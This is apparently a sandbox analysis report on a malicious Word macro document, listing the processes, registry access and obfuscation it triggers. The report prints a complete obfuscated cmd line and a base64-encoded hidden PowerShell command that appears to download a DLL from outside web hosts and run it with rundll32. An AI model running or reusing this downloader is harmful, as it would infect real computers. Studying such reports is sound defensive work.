Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00206D34 9_2_00206D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020893D 9_2_0020893D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F6134 9_2_001F6134
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020D713 9_2_0020D713
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00208F18 9_2_00208F18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020531E 9_2_0020531E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00207F6A 9_2_00207F6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F5155 9_2_001F5155
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F4152 9_2_001F4152
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020A972 9_2_0020A972
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020C340 9_2_0020C340
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F577E 9_2_001F577E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020A746 9_2_0020A746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F6B79 9_2_001F6B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F2362 9_2_001F2362
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F3F9F 9_2_001F3F9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F1B9C 9_2_001F1B9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00207DA5 9_2_00207DA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F7D8A 9_2_001F7D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FED87 9_2_001FED87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC587 9_2_001FC587
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002043BF 9_2_002043BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F65BF 9_2_001F65BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020E985 9_2_0020E985
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F85B3 9_2_001F85B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F9DAE 9_2_001F9DAE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F9DAD 9_2_001F9DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F73A8 9_2_001F73A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020B998 9_2_0020B998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FD1A3 9_2_001FD1A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F0BCC 9_2_001F0BCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001F4DCA 9_2_001F4DCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FC9C0 9_2_001FC9C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0020B5C0 9_2_0020B5C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001FB5F1 9_2_001FB5F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00207BDC 9_2_00207BDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0037303C 9_2_0037303C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00381E14 9_2_00381E14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078704B 10_2_0078704B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078903F 10_2_0078903F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078DC2F 10_2_0078DC2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078620A 10_2_0078620A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00789CC8 10_2_00789CC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00797D7D 10_2_00797D7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00793D7C 10_2_00793D7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078A176 10_2_0078A176
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0079654F 10_2_0079654F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078492A 10_2_0078492A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0079B3FE 10_2_0079B3FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007937F4 10_2_007937F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007989F6 10_2_007989F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_007993C9 10_2_007993C9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078C07D 10_2_0078C07D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00798668 10_2_00798668
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00781658 10_2_00781658
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00791259 10_2_00791259
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00785856 10_2_00785856
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00794E4B 10_2_00794E4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078D44C 10_2_0078D44C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0079C04C 10_2_0079C04C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078A83A 10_2_0078A83A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00798831 10_2_00798831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00787E34 10_2_00787E34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00782628 10_2_00782628
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00784A2B 10_2_00784A2B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0079C424 10_2_0079C424
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0078421E 10_2_0078421E
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Arch_2021_717-1562532.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module A5ate73kc6cw5njy, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Arch_2021_717-1562532.doc OLE indicator, VBA macros: true
PE file contains strange resources
Source: N49I.dll.5.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@28/8@1/4
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$ch_2021_717-1562532.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD799.tmp
Source: Arch_2021_717-1562532.doc OLE indicator, Word Document stream: true
Source: Arch_2021_717-1562532.doc OLE document summary: edited time not present or 0
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: Arch_2021_717-1562532.doc Virustotal: Detection: 16%
Source: Arch_2021_717-1562532.doc ReversingLabs: Detection: 27%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwB
wACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2105632557.0000000002A50000.00000002.00000001.sdmp

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Arch_2021_717-1562532.doc Stream path 'Macros/VBA/Gusca95luq_' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Gusca95luq_ Name: Gusca95luq_
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBS
ACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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 Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00180A90 push edx; ret 7_2_00180C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00169A06 push esi; iretd 7_2_00169A0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001700C8 push es; retn 0000h 7_2_001700CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00452D98 push 00452E25h; ret 7_2_00452E1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460020 push 00460058h; ret 7_2_00460050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00454038 push 00454064h; ret 7_2_0045405C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042A0B2 push 0042A0E0h; ret 7_2_0042A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042A0B4 push 0042A0E0h; ret 7_2_0042A0D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042B274 push 0042B2CDh; ret 7_2_0042B2C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0043C34C push 0043C378h; ret 7_2_0043C370
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042E450 push ecx; mov dword ptr [esp], edx 7_2_0042E454
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004604F4 push 0046055Ch; ret 7_2_00460554
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460498 push 004604EFh; ret 7_2_004604E7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004605F0 push 0046063Ch; ret 7_2_00460634
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460580 push 004605ACh; ret 7_2_004605A4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0045B588 push 0045B5CAh; ret 7_2_0045B5C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004605B8 push 004605E4h; ret 7_2_004605DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00460654 push 00460680h; ret 7_2_00460678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_004606C4 push 004606F0h; ret 7_2_004606E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0042D6DC push 0042D751h; ret 7_2_0042D749
